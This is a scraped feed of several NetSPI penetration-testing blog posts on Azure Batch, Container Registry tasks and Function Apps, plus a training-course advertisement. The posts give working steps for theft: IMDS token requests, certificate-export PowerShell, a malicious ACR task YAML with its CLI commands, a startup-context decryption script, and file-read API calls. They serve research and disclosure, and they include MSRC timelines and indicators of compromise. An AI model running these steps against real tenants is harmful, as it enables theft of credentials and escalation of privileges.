The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.

Service Background – Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.). 

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities. 

If there’s a User Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult. When we started investigating the service, we had to request a pool quota increase just to start using the service. So, keep that in mind if you’re thinking about creating a new pool.

To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri ‘http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/’ -Method GET -Headers @{Metadata=”true”} -UseBasicParsing).Content

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository – https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.

Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path cert:currentUsermy| ForEach-Object{ 
    try{ Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
    [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'',$_.PSChildName,'.pfx'))))
    remove-item (-join($PWD,'',$_.PSChildName,'.pfx'))
    }
    catch{}
}

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = “MII…[Your Base64 Certificate Data]”
[IO.File]::WriteAllBytes("$PWDtestCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses “TotallyNotaHardcodedPassword…” as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

  • Pools Data
    • Environment Variables
  • Start Task Commands
    • Available Storage Container URLs
  • Jobs Data
    • Environment Variables
    • Tasks (Job Preparation, Job Manager, and Job Release)
    • Jobs Sub-Tasks
    • Available Storage Container URLs
  • With Contributor Level Access
    • Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 	1 Batch Account(s) Enumerated
VERBOSE: 		Attempting to dump data from the testspi account
VERBOSE: 			Attempting to dump keys
VERBOSE: 			1 Pool(s) Enumerated
VERBOSE: 				Attempting to dump pool data
VERBOSE: 			13 Job(s) Enumerated
VERBOSE: 				Attempting to dump job data
VERBOSE: 		Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be ‘by design’. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

References:

The post Extracting Sensitive Information from the Azure Batch Service  appeared first on NetSPI.

]]>
Automating Managed Identity Token Extraction in Azure Container Registries https://www.netspi.com/blog/technical-blog/cloud-pentesting/automating-managed-identity-token-extraction-in-azure-container-registries/ Thu, 04 Jan 2024 15:00:00 +0000 https://www.netspi.com/automating-managed-identity-token-extraction-in-azure-container-registries/ Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR.

The post Automating Managed Identity Token Extraction in Azure Container Registries appeared first on NetSPI.

]]>
In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the “Tasks” functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We’ve created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR 
    • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue 
  2. The attacker creates a malicious YAML task file  
    • The task authenticates to the Az CLI as the Managed Identity, then generates a token 
  3. A Task is created with the AZ CLI and the YAML file 
  4. The Task is run in the ACR Task container 
  5. The token is written to the Task output, then retrieved by the attacker 

If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (AZ Login) with an account with the Contributor role on the ACR
  2. Identify the available Container Registries with the following command:
az acr list
  1. Write the following YAML to a local file (.\taskfile) 
version: v1.1.0 
steps: 
  - cmd: az login --identity --allow-no-subscriptions 
  - cmd: az account get-access-token 
  1. Note that this assumes you are using a System Assigned Managed Identity, if you’re using a User-Assigned Managed Identity, you will need to add a “–username <client_id|object_id|resource_id>” to the login command 
  2. Create the task in the ACR ($ACRName) with the following command 
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system] 
  1. If you’re using a User-Assigned Managed Identity, replace [system] with the resource path (“/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/
    Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentitiy>”) for the identity you want to use 
  2. Use the following command to run the command in the ACR 
az acr task run -n sample_acr_task -r $acrName 
  1. The task output, including the token, should be displayed in the output for the run command. 
  2. Next, we will want to delete the task with the following command 
az acr task delete -n sample_acr_task -r $acrName -y 

Please note that while the task may be deleted, the “Runs” of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn’t a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 

Automating Managed Identity Token Extraction in Azure Container Registries

Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target 
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once 
  • By default, the function generates tokens for the “Management” (https://management.azure.com/) service 
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter. 
    • Two commonly used options: 
      1. https://graph.microsoft.com/ – Used for accessing the Graph API
      2. https://vault.azure.net – Used for accessing the Key Vault API 
  • The Output is a Data Table Object that can be assigned to a variable  
    • $tokens = Invoke-AzACRTokenGenerator 
    • This can also be appended with a “+=” to add tokens to the object 
      1. This is handy for storing multiple token scopes (Management, Graph, Vault) in one object 

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 

Example Output:

Automating Managed Identity Token Extraction in Azure Container Registries

Indicators of Compromise (IoCs) 

To better support the defenders out there, we’ve included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name Description 
Microsoft.ContainerRegistry/registries/tasks/write Create or update a task for a container registry. 
Microsoft.ContainerRegistry/registries/scheduleRun/action Schedule a run against a container registry. 
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/actionGet the log SAS URL for a run. 
Microsoft.ContainerRegistry/registries/tasks/delete Delete a task for a container registry.

Conclusion 

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.  

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above. 

The post Automating Managed Identity Token Extraction in Azure Container Registries appeared first on NetSPI.

]]>
Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  https://www.netspi.com/blog/technical-blog/cloud-pentesting/mistaken-identity-azure-function-apps/ Thu, 16 Nov 2023 15:00:00 +0000 https://www.netspi.com/mistaken-identity-azure-function-apps/ NetSPI explores extracting managed identity credentials from Azure Function Apps to expose sensitive data.

The post Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  appeared first on NetSPI.

]]>
As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of the November 11, 2023, this issue has been fully addressed by Microsoft. 

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high-level, this PowerShell code takes in the environmental variable for the SAS tokened URL and gathers the encrypted context to a variable. We then set the decryption key to the corresponding environmental variable, the IV to the start section of the of encrypted context, and then we complete the AES decryption, outputting the fully decrypted context to the HTTP response. 

When building this code, we used an existing Function App in our subscription that had a managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed that there was a previously unnoticed “MSISpecializationPayload” section of the configuration that contained a list of Identities attached to the Function App. 

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account				             SubscriptionName    TenantId       Environment
-------      				     ----------------    ---------      -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research 	         [REDACTED]	AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 – Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 – Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It’s unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.

Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

The post Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  appeared first on NetSPI.

]]>
NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence https://www.netspi.com/blog/executive-blog/personnel-development/dark-side-ops-courses-evolving-cybersecurity-excellence/ Tue, 10 Oct 2023 18:30:47 +0000 https://www.netspi.com/dark-side-ops-courses-evolving-cybersecurity-excellence/ Check out our evolved Dark Side Operations courses with a fully virtual model to evolve your cybersecurity skillset.

The post NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence appeared first on NetSPI.

]]>
Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we’ve taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach. 

The Evolution of DSO

Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful. 

A Fresh Approach

In response to this, we’ve reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we’ve infused a new approach that includes: 

  • Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience. 
  • Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice. 
  • Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience. 
  • Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional. 
  • Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500. 

What is DSO?

DSO 1: Malware Dev Training

  • Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures. 

DSO 2: Adversary Simulation Training

  • Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology. 

DSO Azure: Azure Cloud Pentesting Training 

  • Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure. 

Join us on this journey of continuous learning, where we’re committed to supporting you every step of the way.

Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape. 

The post NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence appeared first on NetSPI.

]]>
Escalating Privileges with Azure Function Apps https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-function-apps/ Thu, 23 Mar 2023 13:24:36 +0000 https://www.netspi.com/azure-function-apps/ Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers.

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP. Net encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tes
ter/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?rel
ativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:homesitewwwroothost.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:homesitewwwrootHttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl 
"https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.
azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/
Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=
0&api-version=2021-01-15")) -Headers @{Authorization="Bearer 
$mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?
relativePath=0&api-version=2021-01-15 
path   : D:homedata 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2
F?relativePath=0&api-version=2021-01-15 
path   : D:homeLogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?
relativePath=0&api-version=2021-01-15 
path   : D:homesite 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F
?relativePath=0&api-version=2021-01-15 
path   : D:homeASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/
tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs/
/ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3
fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.
AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor
DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, 
Version=3.1.18.0, Culture=neutral 
, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4_requiresEncryption="true" xmlns_p4="
https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
